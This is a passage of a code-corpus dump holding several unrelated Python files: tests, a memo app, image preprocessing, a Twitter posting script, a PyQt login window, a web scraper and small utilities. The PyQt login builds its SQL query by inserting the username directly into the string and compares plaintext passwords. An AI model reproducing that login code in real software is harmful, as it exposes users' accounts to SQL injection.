cf.write(g, self.tempfilename_parent,\n external=self.tempfilename_external,\n verbose=0)\n\n h = cf.read(self.tempfilename_parent, verbose=0)\n\n self.assertEqual(len(h), len(parent))\n\n for i in range(len(h)):\n self.assertTrue(parent[i].equals(h[i], verbose=2))\n\n h = cf.read(self.tempfilename_external)\n external = cf.read(self.external_file)\n\n self.assertEqual(len(h), len(external))\n\n for i in range(len(h)):\n self.assertTrue(external[i].equals(h[i], verbose=2))\n\n# --- End: class\n\n\nif __name__ == '__main__':\n print('Run date:', datetime.datetime.now())\n print(cf.environment())\n print()\n unittest.main(verbosity=2)\n","sub_path":"cf/test/test_external.py","file_name":"test_external.py","file_ext":"py","file_size_in_byte":5166,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"372260384","text":"# !/usr/bin/env python\n# -*- coding:utf-8 -*-\n# main.py\n# invoke other file of py to realize functions\n# author: pengtao\n\nimport os\nimport sys\nimport logging\nBASE_PATH = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\nsys.path.append(BASE_PATH)\nfrom core import login, MemoAdmin, config, mylog, memo_out, send_email\n\n\n# logging.disable(logging.CRITICAL)\n# 禁止所有日志输出\ndef main():\n log = mylog.my_logger(BASE_PATH + '\\\\log\\\\' + 'execute\\\n _log.log', logging.DEBUG, 'pengtaolog')\n # 打开日志\n data_file_path = login.register(log) # 用户登录,返回该用户数据文件名\n log.info('用户登录,返回该用户数据文件名')\n memo_o = memo_out.MemoOut(data_file_path) # 生成Memo_Out对象\n log.info('利用数据文件名进行操作')\n\n if len(sys.argv) >= 2:\n if sys.argv[1] in ['-se', '--send_email']: # 系统命令行参数调用发邮件\n log.debug('系统命令行参数调用发邮件')\n while True:\n try:\n ask = input('输出整年(year),整月(month)')\n if ask == 'year':\n data_path, choose = memo_o.out_all_a_year()\n log.debug('获得json文件的路径,和用户年份选择')\n if ask == 'month':\n data_path, choose = memo_o.out_all_a_month()\n log.debug('获得json文件的路径,和用户月份选择')\n break\n except Exception:\n print('输入错误')\n send_email.send_email_attach(f'这是{choose}的数据,请查看!', data_path, 'lv\\\n an1033@live.cn') # 发送给特定人物的邮件\n\n if len(sys.argv) >= 2:\n if sys.argv[1] in ['-rj', '--return_json']: # 系统命令行参数调用返回json数据\n log.debug('系统命令行参数调用返回json数据')\n print(memo_o.get_all_a_month()) # 打印按月份返回的json数据\n\n MemoAdmin.memoadmin(data_file_path) # 利用数据文件名进行操作\n\n config.config(data_file_path) # 用户配置文件生成\n log.info('用户配置文件生成')\n\n\nif __name__ == '__main__':\n main()","sub_path":"0302api-pengtao/51memo/bin/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2283,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"403585604","text":"#!/usr/bin/env python\n# coding: utf-8\nfrom skimage.filters import gaussian, median, laplace\nfrom skimage.morphology import disk\nfrom skimage.feature import canny, hog\n#from skimage.measure import find_contours\nfrom skimage.exposure import adjust_gamma\nfrom sklearn.cluster import KMeans\nfrom sklearn.mixture import GaussianMixture\nfrom skimage.transform import hough_line, hough_line_peaks\nfrom data import trainT1_data, trainT2_data\n\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nprint(trainT1_data.shape)\nprint(trainT2_data.shape)\n\ndef kmeans(im,n):\n data = im.ravel()[:,np.newaxis]\n\n model = KMeans(n_clusters = n)\n model.fit(data)\n label_pred = model.labels_\n label_pred = label_pred.reshape(512,512)\n return label_pred\ndef gmm(im,n):\n data = im.ravel()[:,np.newaxis]\n\n model = GaussianMixture(n_components = n)\n model.fit(data)\n label_pred = model.predict(data)\n label_pred = label_pred.reshape(512,512)\n return label_pred\n\n# data pre-processing\nfrom tensorflow.keras.preprocessing.image import ImageDataGenerator\n\nnb = np.random.randint(trainT1_data.shape[0])\nim = trainT1_data[nb]\n\ndef find_roi1(im, precision):\n # preprocess 1: do the binary separation to get the mask\n med = median(im,disk(5))\n im_gmm_med = gmm(med,n=2)\n if np.mean(im_gmm_med) > 0.5:\n im_gmm_med = np.where(im_gmm_med==0,1,0)\n mask = im_gmm_med*im\n \n # preprocess 2: do hog to detect and separate the spine\n fd, hog_im = hog(mask, orientations=4, pixels_per_cell=(512, precision),\n cells_per_block=(2, 2), visualize=True)\n hog_im = adjust_gamma(hog_im,gamma=0.5)\n \n p = [(2*i+1) for i in range(512//precision)]\n centres = np.array([c*0.5*precision for c in p]).astype(int)\n centres_max = [np.max(hog_im[512//2,centres[i]]) for i in range(512//precision)]\n th = np.mean(centres_max)\n centres_use = [centres[i] for i in range(len(centres_max)) if centres_max[i]>th]\n \n # detect ananomy: there may be some noise in the left of the picture that is noted in the centres_use\n for centre in centres_use:\n if centre + precision not in centres_use and centre - precision not in centres_use:\n centres_use.remove(centre)\n \n # detect ananomy: there may be some noise just in the left of the spine that affected the mask\n while np.max(centres_use) - np.min(centres_use) > 128:\n centres_use.pop(0)\n \n # obtain ROI\n centre_r, centre_l = np.max(centres_use), np.min(centres_use)\n centre_m = int((centre_r + centre_l)/2)\n im_copy = np.zeros_like(im)\n # make some tolerance\n centre_l, centre_m = centre_l - int(0.1 * (centre_m - centre_l)), centre_m + int(0.1 * (centre_m - centre_l))\n im_copy[:,centre_l:centre_m] = mask[:,centre_l:centre_m]\n\n return im_copy\nprecision = 8 # nb of pixcels per cell horizontally, the lower the more precise\nim_roi1 = find_roi1(im, precision)\n\ndef find_roi2(im, precision):\n fd, hog_im = hog(im, orientations=8, pixels_per_cell=(precision, precision),\n cells_per_block=(4, 4), visualize=True)\n return hog_im\nprecision = 2 # nb of pixcels per cell horizontally, the lower the more precise\nim_roi2 = find_roi2(im_roi1, precision)\n\nplt.figure(figsize=(10,5))\nplt.subplot(121)\nplt.imshow(im_roi1,cmap='gray')\nplt.subplot(122)\nplt.imshow(im_roi2,cmap='gray')\nplt.show()\n\n# TODO 试验记录\n# TODO 从去噪声 模糊化效果来看,median保留了更多的特征,比gaussian要好\n\n# plot some train data and preprocess results\nif __name__ == '__main__':\n data_examples = 5\n type_examples = 5\n tested_angles = np.linspace(-np.pi / 2, np.pi / 2, 60)\n plt.figure(figsize=(8*type_examples,8*data_examples))\n\n counter = 1\n for i in range(data_examples):\n nb = np.random.randint(trainT1_data.shape[0])\n im = trainT1_data[nb]\n\n # prepocess\n # 1\n #smo = gaussian(im,sigma=5)\n med = median(im,disk(5))\n #lap = laplace(med,ksize=3)\n \n # 2\n im_gmm_med = gmm(med,n=2)\n if np.mean(im_gmm_med) > 0.5:\n im_gmm_med = np.where(im_gmm_med==0,1,0)\n \n # 3\n im_roi = im_gmm_med*im\n \n # 4\n edg = canny(im_roi, sigma=10)\n h, theta, d = hough_line(edg, theta=tested_angles)\n \n plt.subplot(data_examples,type_examples,counter)\n plt.imshow(im,cmap='gray')\n origin = np.array((0, edg.shape[1]))\n for _, angle, dist in zip(*hough_line_peaks(h, theta, d)):\n if abs(angle) < np.pi/18 and 100 < abs(dist) < 500:\n y0, y1 = (dist - origin * np.cos(angle)) / np.sin(angle)\n plt.plot(origin, (y0, y1), '-r')\n plt.xlim((0, im.shape[1]))\n plt.ylim((im.shape[0], 0))\n plt.title('No.' + str(nb), fontsize=20)\n plt.axis('off')\n counter += 1\n\n plt.subplot(data_examples,type_examples,counter)\n plt.imshow(med,cmap='gray')\n plt.axis('off')\n counter += 1\n\n plt.subplot(data_examples,type_examples,counter)\n plt.imshow(im_gmm_med,cmap='gray')\n plt.axis('off')\n counter += 1\n \n plt.subplot(data_examples,type_examples,counter)\n plt.imshow(im_roi,cmap='gray')\n plt.axis('off')\n counter += 1\n \n plt.subplot(data_examples,type_examples,counter)\n plt.imshow(edg,cmap='gray')\n plt.axis('off')\n counter += 1\n\n plt.show()\n\n\n\n\n\n\n\n","sub_path":"preprocess.py","file_name":"preprocess.py","file_ext":"py","file_size_in_byte":5495,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"292486369","text":"#Given a list of numbers, find the largest number\n# \n\nnumbers = [0,6,2,5,6,9]\n\ndef get_max(list_input):\n max_value = list_input[0]\n for i in list_input:\n if i > max_value:\n max_value = i\n return max_value\nprint(get_max(numbers))\n\n# max = numbers[0]\n\n# for i in numbers:\n# if i > max:\n# max = i\n\n# print(max)\n","sub_path":"highest_number.py","file_name":"highest_number.py","file_ext":"py","file_size_in_byte":347,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"321722394","text":"import numpy as np\nimport tweepy\n\n#variables for accessing twitter API\nconsumer_key='XXXXXXXXXXXXXXXXXXXXXXXXXX'\nconsumer_secret_key='XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX'\naccess_token='XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX'\naccess_token_secret='XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX'\n\nauth=tweepy.OAuthHandler(consumer_key,consumer_secret_key)\nauth.set_access_token(access_token,access_token_secret)\napi=tweepy.API(auth)\n\n\ntweet_text=\"My first Auto Tweet for #CodeChella\"\nimage_path =\"static/uploads/Style_udnie_Mark_Zoo_Mowaa.jpg\"\n\n#Generate text tweet with media (image)\nstatus = api.update_with_media(image_path, tweet_text)\n# api.update_status(status=tweet_text)\n\n\n\n","sub_path":"tweet_to_twitter.py","file_name":"tweet_to_twitter.py","file_ext":"py","file_size_in_byte":675,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"618734648","text":"from PyQt5 import QtCore, QtGui, QtWidgets\r\nfrom PyQt5.QtWidgets import *\r\nfrom PyQt5.QtGui import *\r\nfrom PyQt5.QtCore import *\r\nimport sys\r\nfrom setmodule.setting import set_mod\r\nfrom warnning import Ui_warn\r\nfrom mysqlload import *\r\nimport qtawesome\r\n\r\n\r\nclass Ui_logoin(QWidget):\r\n Signal_parp = pyqtSignal(str)\r\n def __init__(self):\r\n super().__init__()\r\n self.setupUi(self)\r\n self.retranslateUi(self)\r\n\r\n\r\n @pyqtSlot()\r\n def on_yes_clicked(self):\r\n recusername = self.lineEdit.text()\r\n recpassword = self.lineEdit_2.text()\r\n if (recusername == '') or (recpassword == ''):\r\n self.warn = Ui_warn('用户名和密码不得为空!')\r\n self.warn.setWindowModality(Qt.ApplicationModal)\r\n self.warn.show()\r\n else:\r\n try:\r\n face,cur = connectsql()\r\n sql = \"select password from users where user='%s'\"%(recusername)\r\n cur.execute(sql)\r\n sqlpassword = cur.fetchone()\r\n closesql(face, cur)\r\n if sqlpassword==None:\r\n self.warn = Ui_warn('用户不存在!')\r\n self.warn.setWindowModality(Qt.ApplicationModal)\r\n self.warn.show()\r\n elif sqlpassword[0]==recpassword:\r\n data_str = recusername\r\n self.Signal_parp.emit(data_str)\r\n self.close()\r\n else:\r\n self.warn = Ui_warn('密码错误!')\r\n self.warn.setWindowModality(Qt.ApplicationModal)\r\n self.warn.show()\r\n except:\r\n self.warn = Ui_warn('数据连接失败,请设置数据库!')\r\n self.warn.setWindowModality(Qt.ApplicationModal)\r\n self.warn.show()\r\n self.lineEdit.clear()\r\n self.lineEdit_2.clear()\r\n\r\n\r\n def keyPressEvent(self, e):\r\n if e.key() == Qt.Key_Escape:\r\n self.close()\r\n\r\n def setupUi(self, logoin):\r\n logoin.setObjectName(\"logoin\")\r\n logoin.resize(320, 214)\r\n self.gridLayout = QtWidgets.QGridLayout(logoin)\r\n\r\n spin_icon = qtawesome.icon('fa5s.angle-double-right', color='black')\r\n logoin.setWindowIcon(spin_icon)\r\n\r\n self.gridLayout.setObjectName(\"gridLayout\")\r\n self.verticalLayout = QtWidgets.QVBoxLayout()\r\n self.verticalLayout.setObjectName(\"verticalLayout\")\r\n self.title = QtWidgets.QLabel(logoin)\r\n sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Ignored, QtWidgets.QSizePolicy.Preferred)\r\n sizePolicy.setHorizontalStretch(0)\r\n sizePolicy.setVerticalStretch(0)\r\n sizePolicy.setHeightForWidth(self.title.sizePolicy().hasHeightForWidth())\r\n self.title.setSizePolicy(sizePolicy)\r\n self.title.setMinimumSize(QtCore.QSize(300, 60))\r\n self.title.setMaximumSize(QtCore.QSize(300, 70))\r\n self.title.setFocusPolicy(QtCore.Qt.NoFocus)\r\n self.title.setStyleSheet(\"background-color:rgba(0,0,0,0);border-color:rgba(0,0,0,255);color: rgba(0, 0, 0,255);border-style:none;border-width:1px;border-radius:0px;font:29px \\\"方正小标宋简体\\\";font-style:normal;font-weight: normal;text-decoration:blink;\")\r\n self.title.setObjectName(\"title\")\r\n self.verticalLayout.addWidget(self.title)\r\n self.horizontalLayout_2 = QtWidgets.QHBoxLayout()\r\n self.horizontalLayout_2.setObjectName(\"horizontalLayout_2\")\r\n self.count = QtWidgets.QLabel(logoin)\r\n self.count.setMinimumSize(QtCore.QSize(60, 30))\r\n self.count.setStyleSheet(\"background-color:rgba(0,0,0,0);border-color:rgba(0,0,0,255);color: rgba(0, 0, 0,255);border-style:none;border-width:1px;border-radius:0px;font:20px \\\"黑体\\\";font-style:normal;font-weight: normal;text-decoration:blink;\")\r\n self.count.setObjectName(\"count\")\r\n self.horizontalLayout_2.addWidget(self.count)\r\n self.lineEdit = QtWidgets.QLineEdit(logoin)\r\n self.lineEdit.setStyleSheet(\"background-color:rgba(0,0,0,11);border-color:rgba(0,0,0,255);color: rgba(0, 0, 0,255);border-style:solid;border-width:1px;border-radius:7px;font:18px \\\"Times New Roman\\\";\")\r\n self.lineEdit.setObjectName(\"lineEdit\")\r\n self.horizontalLayout_2.addWidget(self.lineEdit)\r\n self.verticalLayout.addLayout(self.horizontalLayout_2)\r\n self.horizontalLayout = QtWidgets.QHBoxLayout()\r\n self.horizontalLayout.setObjectName(\"horizontalLayout\")\r\n self.words = QtWidgets.QLabel(logoin)\r\n self.words.setMinimumSize(QtCore.QSize(60, 50))\r\n self.words.setStyleSheet(\"background-color:rgba(0,0,0,0);border-color:rgba(0,0,0,255);color: rgba(0, 0, 0,255);border-style:none;border-width:1px;border-radius:0px;font:20px \\\"黑体\\\";font-style:normal;font-weight: normal;text-decoration:blink;\")\r\n self.words.setObjectName(\"words\")\r\n self.horizontalLayout.addWidget(self.words)\r\n self.lineEdit_2 = QtWidgets.QLineEdit(logoin)\r\n self.lineEdit_2.setStyleSheet(\"background-color:rgba(0,0,0,11);border-color:rgba(0,0,0,255);color: rgba(0, 0, 0,255);border-style:solid;border-width:1px;border-radius:7px;font:18px \\\"Times New Roman\\\";\")\r\n self.lineEdit_2.setEchoMode(QtWidgets.QLineEdit.Password)\r\n self.lineEdit_2.setObjectName(\"lineEdit_2\")\r\n self.horizontalLayout.addWidget(self.lineEdit_2)\r\n self.verticalLayout.addLayout(self.horizontalLayout)\r\n self.horizontalLayout_3 = QtWidgets.QHBoxLayout()\r\n self.horizontalLayout_3.setObjectName(\"horizontalLayout_3\")\r\n self.yes = QtWidgets.QPushButton(logoin)\r\n self.yes.setMinimumSize(QtCore.QSize(50, 30))\r\n self.yes.setMaximumSize(QtCore.QSize(80, 30))\r\n self.yes.setStyleSheet(\"\")\r\n self.yes.setObjectName(\"yes\")\r\n self.horizontalLayout_3.addWidget(self.yes)\r\n self.quit = QtWidgets.QPushButton(logoin)\r\n self.quit.setMinimumSize(QtCore.QSize(80, 30))\r\n self.quit.setMaximumSize(QtCore.QSize(80, 30))\r\n self.quit.setStyleSheet(\"\")\r\n self.quit.setAutoRepeatDelay(300)\r\n self.quit.setObjectName(\"quit\")\r\n self.horizontalLayout_3.addWidget(self.quit)\r\n self.verticalLayout.addLayout(self.horizontalLayout_3)\r\n self.gridLayout.addLayout(self.verticalLayout, 0, 0, 1, 1)\r\n\r\n logoin.setWindowOpacity(0.9) # 设置窗口透明度\r\n # logoin.setAttribute(QtCore.Qt.WA_TranslucentBackground) # 设置窗口背景透明\r\n logoin.setWindowFlag(QtCore.Qt.FramelessWindowHint) # 隐藏边框\r\n pe = QPalette()\r\n logoin.setAutoFillBackground(True)\r\n pe.setColor(QPalette.Window, Qt.lightGray) # 设置背景色\r\n logoin.setPalette(pe)\r\n\r\n self.retranslateUi(logoin)\r\n self.quit.clicked.connect(logoin.close)\r\n QtCore.QMetaObject.connectSlotsByName(logoin)\r\n\r\n def retranslateUi(self, logoin):\r\n _translate = QtCore.QCoreApplication.translate\r\n logoin.setWindowTitle(_translate(\"logoin\", \"登录\"))\r\n self.title.setText(_translate(\"logoin\", \"

    信息管理系统登录

    \"))\r\n self.count.setText(_translate(\"logoin\", \"用户名:\"))\r\n self.lineEdit.setPlaceholderText(_translate(\"logoin\", \"输入用户名\"))\r\n self.lineEdit_2.setPlaceholderText(_translate(\"logoin\", \"输入密码\"))\r\n self.words.setText(_translate(\"logoin\", \"密 码:\"))\r\n self.yes.setText(_translate(\"logoin\", \"确定\"))\r\n self.quit.setText(_translate(\"logoin\", \"退出\"))\r\n self.quit.setShortcut(_translate(\"logoin\", \"Ctrl+R\"))\r\n\r\nif __name__ == '__main__':\r\n app = QtWidgets.QApplication(sys.argv)\r\n ui = Ui_logoin()\r\n myset = set_mod()\r\n ui.show()\r\n ui.Signal_parp.connect(myset.deal_emit_slot)\r\n sys.exit(app.exec_())","sub_path":"logoin.py","file_name":"logoin.py","file_ext":"py","file_size_in_byte":7913,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"459551090","text":"import re\n\nimport requests\nfrom bs4 import BeautifulSoup\nfrom fake_useragent import UserAgent\n\ndef get_html(url,data):\n html = requests.post(url=url,headers=headers,data=data)\n if html.status_code == 200:\n print(html.text)\n# def pase_html(html):\n# soup = BeautifulSoup(html,'lxml')\n# tradeResult02 = soup.find(class_='tradeResult02')\n# span = tradeResult02.find_all(name='span')[0].text\n# heyueID = span.split()[0][-1]\n# times = span.split()[1][5::]\n# table = tradeResult02.find_all(name='table')[0].find_all('tr')\n# item_sum = []\n# for k in table[1:]:\n# print(k.find_all('td'))\n# print('===')\n\n\n # table = tradeResult02.find_all(name='table')[1].find_all('tr')\n # item_desc = []\n # for i in table[1:-1]:\n # item = { \"成交_名次\": i.find_all('td')[0].text,\n # \"成交_会员\": i.find_all('td')[1].text,\n # \"成交量\": i.find_all('td')[2].text,\n # \"成交_增减\": i.find_all('td')[3].text,\n # \"买单_名次\": i.find_all('td')[4].text,\n # \"买单_会员\": i.find_all('td')[5].text,\n # \"买单量\": i.find_all('td')[6].text,\n # \"买单_增减\": i.find_all('td')[7].text,\n # \"卖单_名次\": i.find_all('td')[8].text,\n # \"卖单_会员\": i.find_all('td')[9].text,\n # \"卖单量\": i.find_all('td')[10].text,\n # \"卖单_增减\": i.find_all('td')[11].text,\n #\n # }\n # item_desc.append(item)\n # print(strs%(heyueID,times,item_desc))\n\n\ndef data_obj():\n '''表单'''\n data = {\n 'contract.variety_id': 'b',\n 'day': '23',\n 'memberDealPosiQuotes.trade_type': '0',\n 'memberDealPosiQuotes.variety': 'b',\n 'month': '6',\n 'year': '2018',\n }\n return data\n\ndef main(url):\n get_html(url,data = data_obj())\nif __name__ == '__main__':\n strs = '''\n {\"_AnalyzeModelName\":\"dce_heyue\",\n \"合约代码\":\"%s\",\n \"日期\":\"%s\",\n \"排名\":%s \n }\n '''\n ua = UserAgent()\n headers = {\n 'User-Agent': ua.random,\n 'Content-Type': 'application/x-www-form-urlencoded',\n 'Host': 'www.dce.com.cn',\n 'Referer': 'http://www.dce.com.cn/publicweb/quotesdata/memberDealPosiQuotes.html',\n }\n url = 'http://www.dce.com.cn/publicweb/quotesdata/memberDealPosiQuotes.html'\n main(url=url)","sub_path":"WorksZhang/GT_0724/requests_dss.py","file_name":"requests_dss.py","file_ext":"py","file_size_in_byte":2482,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"200865226","text":"import functools\nimport inspect\nimport warnings\n\n\ndef get_full_object_name(obj):\n \"\"\"\n Get full name of object\n :param obj:\n :return:\n \"\"\"\n result = []\n if hasattr(obj, '__module__'):\n result.append(getattr(obj, '__module__'))\n if hasattr(obj, '__name__'):\n result.append(getattr(obj, '__name__'))\n return '.'.join(result)\n\n\nclass Deprecated(object):\n def __init__(self, reason):\n if inspect.isclass(reason) or inspect.isfunction(reason):\n raise TypeError(\"Reason for deprecation must be supplied\")\n self.reason = reason\n\n def __call__(self, cls_or_func):\n if inspect.isfunction(cls_or_func):\n if hasattr(cls_or_func, 'func_code'):\n _code = cls_or_func.func_code\n else:\n _code = cls_or_func.__code__\n fmt = \"Call to deprecated function or method {name} ({reason}).\"\n filename = _code.co_filename\n lineno = _code.co_firstlineno + 1\n\n elif inspect.isclass(cls_or_func):\n fmt = \"Call to deprecated class {name} ({reason}).\"\n filename = cls_or_func.__module__\n lineno = 1\n\n else:\n raise TypeError(type(cls_or_func))\n\n msg = fmt.format(name=cls_or_func.__name__, reason=self.reason)\n\n @functools.wraps(cls_or_func)\n def new_func(*args, **kwargs):\n warnings.simplefilter('always', DeprecationWarning) # turn off filter\n warnings.warn_explicit(msg, category=DeprecationWarning, filename=filename, lineno=lineno)\n warnings.simplefilter('default', DeprecationWarning) # reset filter\n return cls_or_func(*args, **kwargs)\n\n return new_func\n\n\n@Deprecated('Bad method')\ndef simple_deprecated(description=None, url=None, new_line=True):\n \"\"\"\n Mark function or method as deprecated\n :param description: short description\n :param url: to issue\n :param new_line: need split lines\n :return:\n \"\"\"\n\n def wrapper(func):\n func_name = '.'.join([func.__module__, func.__name__])\n message = [\"[WARNING]\\tMethod '{}' deprecated and will be removed in the future.\".format(func_name)]\n if description is not None:\n message.append('\\tDescription: ' + str(description))\n if url is not None:\n message.append('\\tURL: ' + str(url))\n print(('\\n' if new_line else '').join(message))\n return func\n\n return wrapper\n","sub_path":"NucleusUtils/versions/deprecated.py","file_name":"deprecated.py","file_ext":"py","file_size_in_byte":2465,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"65863201","text":"# -*- coding: utf-8 -*-\n#参考: https://qiita.com/hasekou_tech/items/acd0d9159a9001ebfbd3\n\nimport datetime\nimport cv2\n\n#時刻取得\nnowtime = datetime.datetime.now()\nnowtime_string = nowtime.strftime('%Y-%m-%d %H:%M:%S')\n\n#写真撮影\nURL = \"localhost/?action=stream\"\ncamera = cv2.VideoCapture(URL)\ncamera.set(cv2.CAP_PROP_FRAME_WIDTH, 1280) # カメラ画像の横幅を1280に設定\ncamera.set(cv2.CAP_PROP_FRAME_HEIGHT, 720) # カメラ画像の縦幅を720に設定\n_, frame = camera.read()\ncamera.release()\n\n#日時合成\ncv2.putText(frame,nowtime_string,(25,50),cv2.FONT_HERSHEY_SIMPLEX, 1.5,(232, 167, 145), 10)\ncv2.putText(frame,nowtime_string,(25,50),cv2.FONT_HERSHEY_SIMPLEX, 1.5,(70, 158, 162), 2)\ncv2.imwrite(\"/dev/shm/kuma_newimage.jpg\", frame)\n","sub_path":"Python/ImageDownlink.py","file_name":"ImageDownlink.py","file_ext":"py","file_size_in_byte":761,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"390905984","text":"#!/bin/python\nimport mailbox\nimport email\nimport re\nimport time\nimport urwid\n\n\nmail = mailbox.Maildir('~/mail/gmail/INBOX')\n\nnum = 10\n\n#def decode_header(header):\n# subj, enc = email.header.decode_header(header)[0]\n# if enc is not None:\n# return subj.decode(enc)\n# else:\n# return subj\ndef get_header(header):\n literal, enc = email.header.decode_header(header)[0]\n if enc is None:\n try:\n return literal.decode('utf-8')\n except:\n return literal\n else:\n return literal.decode(enc)\n\ndef get_msg_lines(msgs):\n msg_lines = []\n\n for msg in msgs:\n header_from = get_header(msg['from'])\n name, adress = email.utils.parseaddr(header_from)\n\n if not name:\n name = adress\n\n header_date = get_header(msg['date'])\n date = email.utils.parsedate(header_date)\n datestr = time.strftime(\"%m/%d\", date)\n\n subject = get_header(msg['subject'])\n\n msg_lines.append(\"{0:<5.5} {1:<20.20} {2:<80.80}\".format(datestr, name, subject))\n\n return msg_lines\n\ndef get_msgs():\n return map(lambda x: mail[x], sorted(mail.keys(), \n key=lambda y: email.utils.parsedate(mail[y]['date']), reverse=True)[:num])\n\n\ndef show_or_exit(key):\n if key in ('q', 'Q'):\n raise urwid.ExitMainLoop()\n txt.set_text(repr(key))\n\n\ntxt = urwid.Text(u\"Hello World\")\nfill = urwid.Filler(txt, 'top')\nloop = urwid.MainLoop(fill,\nunhandled_input=show_or_exit)\nloop.run()\n","sub_path":"mehl/mehl.py","file_name":"mehl.py","file_ext":"py","file_size_in_byte":1478,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"320833410","text":"import inspect\n\ndef is_instance_method(method):\n\tnumber_of_args = len(inspect.getargspec(method)[0])\n\tif number_of_args > 2:\n\t\traise ValueError('Functions may only take one (static method) or two (instance method) arguments.')\n\treturn number_of_args == 2\n\nclass validator(object):\n\t\"\"\"\n\t\tThe validator decorator is a method decorator that specifies\n\t\ta key and an error message indicating which data parameter\n\t\tthe method validates and what the error message should be\n\t\tif the validation fails.\n\t\"\"\"\n\n\tdef __init__(self, key, error, order=0, *args, **kwargs):\n\t\tself.key = key\n\t\tself.error = error\n\t\tself.order = order\n\n\tdef __call__(self, func):\n\t\tfunc.validator = True\n\t\tfunc.key = self.key\n\t\tfunc.error = self.error\n\t\tfunc.order = self.order\n\t\tfunc.is_instance = is_instance_method(func)\n\t\treturn func","sub_path":"venv/Lib/site-packages/commands/decorators/validator.py","file_name":"validator.py","file_ext":"py","file_size_in_byte":806,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"315487728","text":"\"\"\"\nRiskPaths\nThis will be a neworder implementation of the RiskPaths MODGEN model\n\nSee: \nhttps://www.statcan.gc.ca/eng/microsimulation/modgen/new/chap3/chap3\nhttps://www.statcan.gc.ca/eng/microsimulation/modgen/new/chap4/chap4\n\n 'RiskPaths is a simple, competing risk, case-based continuous time microsimulation model. Its\n main use is as a teaching tool, introducing microsimulation to social scientists and demonstrating\n how dynamic microsimulation models can be efficiently programmed using the language\n Modgen.\n Modgen is a generic microsimulation programming language developed and maintained at\n Statistics Canada.\n RiskPaths as well as the Modgen programming language and other related documents are\n available at www.statcan.gc.ca/microsimulation/modgen/modgen-eng.htm'\n\n\"\"\"\nimport numpy as np\nimport neworder\n\npopulation_size = 10000\n\n# running/debug options\nneworder.log_level = 1\nneworder.do_checks = False\n \n# initialisation\nneworder.initialisations = {\n \"people\": { \"module\": \"riskpaths\", \"class_\": \"RiskPaths\", \"parameters\": [population_size] }\n}\n\nneworder.transitions = {\n \"status\": \"people.pregnancy()\"\n}\n\n# Finalisation \nneworder.checkpoints = {\n \"1stats\": \"people.stats()\",\n \"2hist\": \"people.plot()\"\n}\n","sub_path":"examples/riskpaths/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":1235,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"13548008","text":"from margo_parser.tokenizer.tokenizer import tokenize\n\n\ndef test_empty_source():\n tokenized = tokenize(\"\")\n assert type(tokenized) == dict\n assert tokenized[\"TYPE\"] == \"BLOCK\"\n assert tokenized[\"SYNTAX\"] == \"MARGO\"\n\n assert len(tokenized[\"BODY\"]) == 0\n\n\ndef test_only_endblocks():\n tokenized = tokenize(\":: :: :: ::\")\n assert len(tokenized[\"BODY\"]) == 0\n\n\ndef test_ignore_cell():\n tokenized = tokenize(\"ignore-cell ::\")\n assert len(tokenized[\"BODY\"]) == 1\n assert tokenized[\"BODY\"][0][\"TYPE\"] == \"DIRECTIVE\"\n assert tokenized[\"BODY\"][0][\"NAME\"] == \"ignore-cell\"\n\n\ndef test_basic_declaration():\n \"\"\"\n If no language is specified, a declaration is treated\n as a JSON array without the enclosing brackets required\n \"\"\"\n\n tokenized = tokenize(\n \"\"\"\n hello_basic: \"world!!!\",\n 1,\n true, 3, false, null, ::\n \"\"\"\n )\n\n assert len(tokenized[\"BODY\"]) == 1\n declaration = tokenized[\"BODY\"][0]\n assert declaration[\"TYPE\"] == \"DECLARATION\"\n assert declaration[\"NAME\"] == \"hello_basic\"\n assert declaration[\"VALUE\"] == [\"world!!!\", 1, True, 3, False, None]\n\n\ndef test_json_declaration():\n \"\"\"\n Users can assert that a declaration is valid JSON,\n and it will be parsed (or fail)\n \"\"\"\n\n tokenized = tokenize(\n \"\"\"\n hello [json]: '[\"world!!\",\n 1,\n true,\n 3,\n false,\n null]'\n ::\n \"\"\"\n )\n declaration = tokenized[\"BODY\"][0]\n assert declaration[\"VALUE\"] == [\"world!!\", 1, True, 3, False, None]\n\n\ndef test_yaml_declaration():\n tokenized = tokenize(\n \"\"\"\n hello [yaml]: '\n - \"world!!\"\n - 1\n - true\n - 3\n - false\n - null'\n ::\n \"\"\"\n )\n declaration = tokenized[\"BODY\"][0]\n assert declaration[\"VALUE\"] == [\"world!!\", 1, True, 3, False, None]\n\n\ndef test_raw_declaration():\n inner_string = \"hello world!! 1 true 3 false null\"\n test_string = f\"\"\"\n hello [raw]: '{inner_string}' ::\n \"\"\"\n tokenized = tokenize(test_string)\n\n declaration = tokenized[\"BODY\"][0]\n assert declaration[\"VALUE\"] == inner_string\n","sub_path":"tests/test_parser.py","file_name":"test_parser.py","file_ext":"py","file_size_in_byte":2092,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"273991735","text":"'''\r\nCreated on 6 aug. 